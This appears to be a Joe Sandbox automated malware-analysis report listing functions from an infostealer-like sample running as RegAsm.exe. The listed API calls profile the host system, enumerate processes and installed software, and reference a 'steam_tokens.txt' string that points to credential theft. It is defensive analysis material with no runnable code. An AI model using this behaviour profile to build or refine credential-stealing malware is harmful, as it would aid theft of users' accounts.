Function 6C2A3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C2A3095

Part of subcall function 6C2A35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C32F688,00001000), ref: 6C2A35D5
Part of subcall function 6C2A35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C2A35E0
Part of subcall function 6C2A35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C2A35FD
Part of subcall function 6C2A35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C2A363F
Part of subcall function 6C2A35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C2A369F
Part of subcall function 6C2A35A0: __aulldiv.LIBCMT ref: 6C2A36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2A309F

Part of subcall function 6C2C5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5B85
Part of subcall function 6C2C5B50: EnterCriticalSection.KERNEL32(6C32F688,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5B90
Part of subcall function 6C2C5B50: LeaveCriticalSection.KERNEL32(6C32F688,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5BD8
Part of subcall function 6C2C5B50: GetTickCount64.KERNEL32 ref: 6C2C5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C2A30BE

Part of subcall function 6C2A30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C2A3127
Part of subcall function 6C2A30F0: __aulldiv.LIBCMT ref: 6C2A3140

Part of subcall function 6C2DAB2A: __onexit.LIBCMT ref: 6C2DAB30

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 919fdc6acba8ee71789347dd132972eeb806430a7a0df7bbe0cf38ec844246e2
Instruction ID: 018414527880f10b3985dad07ea365d40d74c372cad8ab9a2c7325762c9be0f9
Opcode Fuzzy Hash: 919fdc6acba8ee71789347dd132972eeb806430a7a0df7bbe0cf38ec844246e2
Instruction Fuzzy Hash: 97F0F422E20B9896CF10DF748841AE6B378EF6F214F51572EEC4463621FB24A1D88382

Function 00419470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004194A5
CloseHandle.KERNEL32(00000000), ref: 004194AF

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 5dd3e3c532ac976404615b3816d87456bc90bb789159ce0b3212725986e21d85
Instruction ID: 2eda5d4ec063f04fe8048fb8b0a850fc323e1bbd58c3ab932ea79d0f281d5f74
Opcode Fuzzy Hash: 5dd3e3c532ac976404615b3816d87456bc90bb789159ce0b3212725986e21d85
Instruction Fuzzy Hash: BEF03A7994020CFBDB15DFA4DC4AFEA7778EB08310F004498BA1997290D6B4AE85CB95

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699

Function 00411A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00417500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
Part of subcall function 00417500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
Part of subcall function 00417500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
Part of subcall function 00417500: HeapAlloc.KERNEL32(00000000), ref: 0041760A

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 004176AB

Part of subcall function 004177C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DBC0,000000FF,?,00411C99,00000000,?,013428E0,00000000,?), ref: 004177F2
Part of subcall function 004177C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DBC0,000000FF,?,00411C99,00000000,?,013428E0,00000000,?), ref: 004177F9

Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Part of subcall function 00417980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
Part of subcall function 00417980: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
Part of subcall function 00417980: GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
Part of subcall function 00417980: wsprintfA.USER32 ref: 004179F3

Part of subcall function 00417A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01342A20,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
Part of subcall function 00417A30: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,01342A20,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
Part of subcall function 00417A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01342A20,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D

Part of subcall function 00417B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,01342A20,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417B35

Part of subcall function 00417B90: GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
Part of subcall function 00417B90: LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
Part of subcall function 00417B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
Part of subcall function 00417B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
Part of subcall function 00417B90: LocalFree.KERNEL32(00000000), ref: 00417D22

Part of subcall function 00417D80: GetSystemPowerStatus.KERNEL32(?), ref: 00417DAD

GetCurrentProcessId.KERNEL32(00000000,?,01342920,00000000,?,00420E24,00000000,?,00000000,00000000,?,01342D68,00000000,?,00420E20,00000000), ref: 0041207E

Part of subcall function 00419470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419484
Part of subcall function 00419470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004194A5
Part of subcall function 00419470: CloseHandle.KERNEL32(00000000), ref: 004194AF

Part of subcall function 00417E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
Part of subcall function 00417E00: HeapAlloc.KERNEL32(00000000), ref: 00417E3E
Part of subcall function 00417E00: RegOpenKeyExA.KERNEL32(80000002,0133C320,00000000,00020119,?), ref: 00417E5E
Part of subcall function 00417E00: RegQueryValueExA.KERNEL32(?,01342680,00000000,00000000,000000FF,000000FF), ref: 00417E7F

Part of subcall function 00417F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00417FC9
Part of subcall function 00417F60: GetLastError.KERNEL32 ref: 00417FD8

Part of subcall function 00417ED0: GetSystemInfo.KERNEL32(00420E2C), ref: 00417F00
Part of subcall function 00417ED0: wsprintfA.USER32 ref: 00417F16

Part of subcall function 00418100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01342CA8,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
Part of subcall function 00418100: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,01342CA8,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
Part of subcall function 00418100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
Part of subcall function 00418100: __aulldiv.LIBCMT ref: 00418172
Part of subcall function 00418100: __aulldiv.LIBCMT ref: 00418180
Part of subcall function 00418100: wsprintfA.USER32 ref: 004181AC

Part of subcall function 004187C0: CreateDCA.GDI32(0133A978,00000000,00000000,00000000), ref: 004187F5
Part of subcall function 004187C0: GetDeviceCaps.GDI32(?,00000008), ref: 00418804
Part of subcall function 004187C0: GetDeviceCaps.GDI32(?,0000000A), ref: 00418813
Part of subcall function 004187C0: ReleaseDC.USER32(00000000,?), ref: 00418822
Part of subcall function 004187C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
Part of subcall function 004187C0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
Part of subcall function 004187C0: wsprintfA.USER32 ref: 00418850

Part of subcall function 004181F0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00418254

Part of subcall function 00418320: RegOpenKeyExA.KERNEL32(00000000,01336400,00000000,00020019,00000000,004205B6), ref: 004183A4

Part of subcall function 00418320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
Part of subcall function 00418320: wsprintfA.USER32 ref: 00418459
Part of subcall function 00418320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041847B

Part of subcall function 00418680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
Part of subcall function 00418680: Process32First.KERNEL32(?,00000128), ref: 004186DE
Part of subcall function 00418680: Process32Next.KERNEL32(?,00000128), ref: 004186F3
Part of subcall function 00418680: CloseHandle.KERNEL32(?), ref: 00418761

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041265B

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$NameOpenlstrcpy$InformationLocal$CapsCloseCreateCurrentDeviceEnumHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerDefaultDevicesDirectoryDisplayErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQueryReleaseSnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 2168326814-0
Opcode ID: 67238461175b16d0f559d7271cfe973b45a91833d20322d4f1dd3c489d9a2da2
Instruction ID: 920ebc2bd1264ef58e9e042ab956aee0a7d7d625442637cc145e34ec31588ac2
Opcode Fuzzy Hash: 67238461175b16d0f559d7271cfe973b45a91833d20322d4f1dd3c489d9a2da2
Instruction Fuzzy Hash: CA72A172C11018AADB19FB91DD92EEEB33CAF14314F50469FB11662051EF342BDACB69

Function 00415100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

lstrlenA.KERNEL32(00000000,00000000,00420ACA,?,?,?,?,?,?,0041610B,?), ref: 0041512A

Strings

steam_tokens.txt, xrefs: 0041513F

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 90d951ad21855e740731337b552063bf12abdc695662d06ca1b8b15863fa6e7c
Instruction ID: 0b443913f8ff21268bbca5da4ddd77cab48c5630089faae76e13a1e44d6df956
Opcode Fuzzy Hash: 90d951ad21855e740731337b552063bf12abdc695662d06ca1b8b15863fa6e7c
Instruction Fuzzy Hash: E4F06D3194110866CB04F7B2EC539ED733C9F50358F80416EB413620D2EF3C675AC6AA

Function 00417ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00420E2C), ref: 00417F00
wsprintfA.USER32 ref: 00417F16

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 6e48eb6c373aebad151474fa646ebf8a74f2430de7cecad2b643f906b25ca64a
Instruction ID: 2fbe6902627a031950d7a3fa851ef95510e90209490a35db063d7eb50f57f6da
Opcode Fuzzy Hash: 6e48eb6c373aebad151474fa646ebf8a74f2430de7cecad2b643f906b25ca64a
Instruction Fuzzy Hash: 53F0F6B5A44218FBC710CF84DC45FEAF7BCF744710F50066AF50592280D37929408BD5

Function 0040B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

lstrlenA.KERNEL32(00000000), ref: 0040B9C2
lstrlenA.KERNEL32(00000000), ref: 0040B9D6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$memcmp
String ID:
API String ID: 3457870978-0
Opcode ID: c2dc4afb35a879fc0b70174ab8d9775e4f502b4a9f8844f1bbf0cb2c0b9d0ec5
Instruction ID: 4e9d2fdd6b59a5819e0b0cc177d60c70936eaf215788bcf9b06e28604354d71c
Opcode Fuzzy Hash: c2dc4afb35a879fc0b70174ab8d9775e4f502b4a9f8844f1bbf0cb2c0b9d0ec5
Instruction Fuzzy Hash: EEE133729111189BDB04FBA1CD92EEE7339AF14314F40456EF50672091EF386B9ACB7A

Function 0040AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

lstrlenA.KERNEL32(00000000), ref: 0040B16A
lstrlenA.KERNEL32(00000000), ref: 0040B17E

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
